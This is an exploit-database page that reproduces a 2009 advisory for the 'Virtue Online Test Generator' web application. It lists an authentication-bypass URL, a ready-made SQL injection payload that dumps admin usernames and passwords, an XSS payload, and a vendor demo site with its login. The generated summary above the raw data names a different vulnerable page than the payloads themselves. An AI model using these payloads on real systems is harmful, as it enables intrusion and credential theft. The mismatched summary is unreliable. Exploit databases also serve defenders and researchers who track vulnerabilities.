header-logo
Suggest Exploit
vendor:
Virtue Online Test Generator
by:
HxH
8,8
CVSS
HIGH
Authentication Bypass, SQL Injection, Cross-Site Scripting
89, 79, 79
CWE
Product Name: Virtue Online Test Generator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities

Virtue Online Test Generator is vulnerable to authentication bypass, SQL injection and Cross-Site Scripting. After user login, an attacker can bypass authentication by accessing the admin/index.php page. An attacker can also inject SQL queries by accessing the admin/test_generator.php page with a malicious SQL query. Additionally, an attacker can inject XSS payloads by accessing the admin/test_generator.php page with a malicious XSS payload.

Mitigation:

Ensure that user input is properly sanitized and validated. Use parameterized queries to prevent SQL injection. Use a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

+===================================================================================+
|                                                                                   |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: HxH                                                                      |
| Contact: HxH[at]live[dot]at                                                       |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Script.: Virtue Online Test Generator                                             |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit: After user login                                                         |
|                                                                                   |
| [+] Auth Bypass                                                                   |
|                                                                                   |
| http://[website]/[script]/admin/index.php                                         |
|                                                                                   |
| [+] SQLi                                                                          |
|                                                                                   |
| http://[website]/[script]/text.php?tid=[SQL]                                      |
|                                                                                   |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
|                                                                                   |
| [+] XSS                                                                           |
|                                                                                   |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Demo...: http://www.virtuenetz.com/exam                                           |
| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo                                   |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
|                                                                                   |
+===================================================================================+

# milw0rm.com [2009-06-26]

Navigation

Suggest Exploit

Services By CQR